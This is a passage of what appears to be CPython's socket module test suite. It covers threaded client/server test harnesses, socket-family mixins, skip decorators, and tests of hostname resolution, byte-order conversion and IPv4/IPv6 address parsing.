# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
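# Illustrative sketch (the class and method names here are hypothetical,
# not part of this module): a concrete combination of the mixins defined
# below could look like
#
#   class EchoOverTCPTest(ConnectedStreamTestMixin, TCPTestBase):
#       def testEcho(self):
#           self.assertEqual(self.cli_conn.recv(1024), MSG)
#       def _testEcho(self):
#           self.serv_conn.send(MSG)
#
# where, as with SocketConnectedTest, testEcho() runs in the server
# thread and _testEcho() runs in the client thread.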
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
socket_helper.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class UDPLITETestBase(InetTestBase):
"""Base class for UDPLITE-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = socket_helper.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
class UDPLITE6TestBase(Inet6TestBase):
"""Base class for UDPLITE-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
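# Illustrative usage of skipWithClientIf() (hypothetical test names):
# the server-side test method is decorated directly, and its client-side
# counterpart reuses the client_skip attribute so the client thread runs
# a no-op when the test is skipped:
#
#   @skipWithClientIf(fcntl is None, "need fcntl")
#   def testFeature(self): ...
#
#   @testFeature.client_skip
#   def _testFeature(self): ...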
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
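# Illustrative usage of requireAttrs() (hypothetical test names), which
# follows the same client_skip pattern as skipWithClientIf():
#
#   @requireAttrs(socket.socket, 'recvmsg')
#   def testRecvmsgFeature(self): ...
#
#   @testRecvmsgFeature.client_skip
#   def _testRecvmsgFeature(self): ...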
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
@unittest.skipUnless(sys.platform == 'darwin', 'macOS specific test')
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test3542SocketOptions(self):
# Ref. issue #35569 and https://tools.ietf.org/html/rfc3542
opts = {
'IPV6_CHECKSUM',
'IPV6_DONTFRAG',
'IPV6_DSTOPTS',
'IPV6_HOPLIMIT',
'IPV6_HOPOPTS',
'IPV6_NEXTHOP',
'IPV6_PATHMTU',
'IPV6_PKTINFO',
'IPV6_RECVDSTOPTS',
'IPV6_RECVHOPLIMIT',
'IPV6_RECVHOPOPTS',
'IPV6_RECVPATHMTU',
'IPV6_RECVPKTINFO',
'IPV6_RECVRTHDR',
'IPV6_RECVTCLASS',
'IPV6_RTHDR',
'IPV6_RTHDRDSTOPTS',
'IPV6_RTHDR_TYPE_0',
'IPV6_TCLASS',
'IPV6_USE_MIN_MTU',
}
for opt in opts:
self.assertTrue(
hasattr(socket, opt), f"Missing RFC3542 socket option '{opt}'"
)
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [socket_helper.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test socket_helper.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [socket_helper.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
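    # Worked example (assuming a little-endian host): socket.htons(0x1234)
    # returns 0x3412, so htons(htons(0x1234)) round-trips to 0x1234; on a
    # big-endian host htons() is the identity and the round-trip is trivial.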
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on these platforms, as some of them ship a
# non-standard port/protocol entry for it that breaks the test's assumptions
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
